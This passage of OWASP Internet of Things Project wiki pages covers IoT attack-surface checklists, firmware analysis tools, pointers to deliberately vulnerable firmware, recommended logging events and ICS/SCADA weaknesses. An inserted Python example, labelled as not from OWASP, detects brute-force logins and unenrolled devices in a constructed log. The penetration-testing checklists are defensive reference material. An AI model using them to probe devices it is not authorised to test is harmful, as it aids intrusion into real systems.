* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
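As an added example (not part of the OWASP project or this page), the following Python script turns a constructed key=value device access log into several of the events listed in the table above: it emits Request, Authentication and Ecosystem Membership exceptions as structured log events. The log format, the enrolled-device list and the thresholds are assumptions made for the example.<br />

```python
"""Emit OWASP IoT logging events from a constructed device access log.

Added example, not OWASP project code. The key=value line format, the
enrolled-device list and the thresholds below are assumptions; the event
names are taken from the IoT Logging Events table.
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Assumed policy values for this example.
ENROLLED_DEVICES = {"cam-01", "cam-02"}   # devices enrolled in the ecosystem
SUPPORTED_METHODS = {"GET", "POST"}        # every other HTTP method is logged
FAIL_THRESHOLD = 3      # failed passwords for one user before an event fires
RATE_THRESHOLD = 4      # login attempts from one source ...
RATE_WINDOW_S = 60      # ... within this many seconds
MAX_PARAM_LEN = 64      # longest query parameter value we expect
PARAM_CHARS = re.compile(r"^[A-Za-z0-9_.-]*$")   # expected parameter charset

# Constructed sample log: one gateway's access log in key=value form.
LONG_VALUE = "A" * 100
SAMPLE_LOG = [
    "ts=2019-11-01T07:00:01Z src=10.0.0.5 dev=cam-01 method=POST path=/login user=admin result=fail",
    "ts=2019-11-01T07:00:02Z src=10.0.0.5 dev=cam-01 method=POST path=/login user=admin result=fail",
    "ts=2019-11-01T07:00:03Z src=10.0.0.5 dev=cam-01 method=POST path=/login user=admin result=fail",
    "ts=2019-11-01T07:00:04Z src=10.0.0.5 dev=cam-01 method=POST path=/login user=admin result=ok",
    "ts=2019-11-01T07:00:10Z src=10.0.0.9 dev=cam-77 method=GET path=/status user=- result=ok",
    "ts=2019-11-01T07:00:11Z src=10.0.0.9 dev=cam-01 method=TRACE path=/ user=- result=fail",
    f"ts=2019-11-01T07:00:12Z src=10.0.0.9 dev=cam-01 method=GET path=/config?id={LONG_VALUE} user=- result=fail",
    "ts=2019-11-01T07:00:13Z src=10.0.0.9 dev=cam-01 method=GET path=/config?id=cam<01> user=- result=fail",
]


def parse_line(line):
    """Split a key=value log line into a dict; the ts field becomes a datetime."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return fields


class IoTEventLogger:
    """Stateful detector that maps access-log records to OWASP IoT logging events."""

    def __init__(self):
        self.fails = defaultdict(int)        # user -> consecutive failed logins
        self.attempts = defaultdict(deque)   # src -> timestamps of recent login attempts
        self.events = []

    def _emit(self, category, event, rec):
        self.events.append({"category": category, "event": event,
                            "ts": rec["ts"].isoformat(), "src": rec["src"], "dev": rec["dev"]})

    def process(self, rec):
        # Ecosystem Membership Exceptions: traffic from a device we never enrolled.
        if rec["dev"] not in ENROLLED_DEVICES:
            self._emit("Ecosystem Membership Exceptions", "Traffic Seen from Unenrolled System", rec)
        # Request Exceptions: unsupported verb, oversized or oddly-typed parameter values.
        if rec["method"] not in SUPPORTED_METHODS:
            self._emit("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method", rec)
        path, _, query = rec["path"].partition("?")
        for param in (query.split("&") if query else []):
            value = param.partition("=")[2]
            if len(value) > MAX_PARAM_LEN:
                self._emit("Request Exceptions", "Unexpected Quantity of Characters in Parameter", rec)
            if not PARAM_CHARS.match(value):
                self._emit("Request Exceptions", "Unexpected Type of Characters in Parameter", rec)
        # Authentication Exceptions: rate of attempts per source, failures per user.
        if path == "/login":
            window = self.attempts[rec["src"]]
            window.append(rec["ts"])
            while (rec["ts"] - window[0]).total_seconds() > RATE_WINDOW_S:
                window.popleft()                 # drop attempts older than the window
            if len(window) == RATE_THRESHOLD:    # fire once, when the threshold is reached
                self._emit("Authentication Exceptions", "High Rate of Login Attempts", rec)
            if rec["result"] == "fail":
                self.fails[rec["user"]] += 1
                if self.fails[rec["user"]] == FAIL_THRESHOLD:
                    self._emit("Authentication Exceptions", "Multiple Failed Passwords", rec)
            else:
                self.fails[rec["user"]] = 0      # a successful login resets the counter


def detect(lines):
    """Run the detector over raw log lines and return the emitted events in order."""
    logger = IoTEventLogger()
    for line in lines:
        if line.strip():
            logger.process(parse_line(line))
    return logger.events


if __name__ == "__main__":
    for event in detect(SAMPLE_LOG):
        print(json.dumps(event))
```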
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security, and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255231OWASP Internet of Things Project2019-10-04T17:38:29Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute, and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
